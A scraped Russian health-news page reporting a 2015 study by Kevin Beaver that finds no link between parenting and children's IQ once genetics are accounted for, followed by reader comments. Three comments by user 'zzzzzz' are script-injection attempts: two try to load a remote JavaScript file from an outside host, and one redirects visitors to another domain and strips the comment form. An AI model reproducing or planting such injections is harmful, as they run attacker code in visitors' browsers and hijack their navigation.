Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ваш ребенок обречен быть ...  >>  Ваш ребенок обречен быть глупым? Или вы можете сделать его умнее?
 
Обратная связь
 

Ваш ребенок обречен быть глупым? Или вы можете сделать его умнее?

Размер шрифта
11 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Совместное чтение книг, беседы и занятия с ребенком – все это прекрасные способы провести с ним время, однако, по мнению ученых, они не оказывают никакого влияния на его развитие и уровень интеллекта.

Ваш ребенок обречен быть глупым? Или вы можете сделать его умнее?

Профессор Кевин Бивер из Университета Флориды проанализировал большую группу детей, в том числе и усыновленных, чтобы выяснить, влияет ли родительское воспитание на уровень их IQ. В исследовании были изучены типы родительского поведения, а также их влияние на грамотность речи ребенка. Каждый участник проходил специальный словарный тест в картинках, который позволяет оценить словарный запас. Тесты на уровень IQ проводились во время обучения в средней и старшей школе, а также в возрасте от 18 до 26 лет.

«Предыдущие исследования показали, что родительское воспитание оказывает влияние на ум и грамотность речи детей. Однако вероятнее всего это не так, поскольку в данных работах не учитывались факторы генетики и наследственности», – рассказывает Бивер. Его новое исследование было опубликовано в журнале Intelligence.

Вопрос о том, влияет ли воспитание на уровень интеллекта ребенка, долго оставался предметом споров. Некоторые исследования показали, что те дети, родители которых уделяют много времени занятиям с ними, обычно оказываются умнее, чем их сверстники, чьи родители уделяют воспитанию не так много времени. Однако существует и другая точка зрения. Она состоит в том, что интеллект ребенка вовсе не зависит от родительского воспитания, он наследуется генетически. Именно для того, чтобы проверить две эти гипотезы, профессор Бивер провел свое исследование, в котором приняли участие в том числе усыновленные дети.

«Мы решили, что будет очень интересно провести подобную работу. И когда мы проанализировали обе эти гипотезы и учли генетические факторы, то выяснили, что связь между воспитанием и будущим уровнем интеллекта детей отсутствует», – объясняет Бивер. «Все дело в том, что более образованные и умные родители, как правило, в большей степени занимаются воспитанием своих детей, что маскирует тот факт, что уровень интеллекта на самом деле генетически наследуется», – объясняет он.

Значит ли это, что родители могут и вовсе не уделять внимания воспитанию своих детей? Конечно же, нет. Однако и слишком усердствовать не стоит – это все равно не сделает из вашего ребенка гения.

Другие вопросы материнства и воспитания детей освещаются на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

14 июня 2015 в 08:11

Цитировать   |   Пожаловаться

Ну что за бред?

2 - Гость

16 июня 2015 в 02:37

Цитировать   |   Пожаловаться

"выяснили, что связь между воспитанием и будущим уровнем интеллекта детей отсутствует"-а как же дети-маугли? 

3 - zzzzzz

29 июня 2015 в 23:51

Комментарий удален за нарушение Правил общения

4 - zzzzzz

30 июня 2015 в 18:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 21:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 22:05

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что можно узнать о жизни ребенка в социальных сетях   Арт-парад Елки-2015: приносим праздник в детские больницы   Родители стали хуже после падения Берлинской стены!   Тайные опасности для ребенка дома  
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Как кормить грудью
Первые шаги вашего малыша
Растяжки! Можно ли от них избавиться?

Тесты

Возраст мозга
Знаете ли вы свой мозг?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.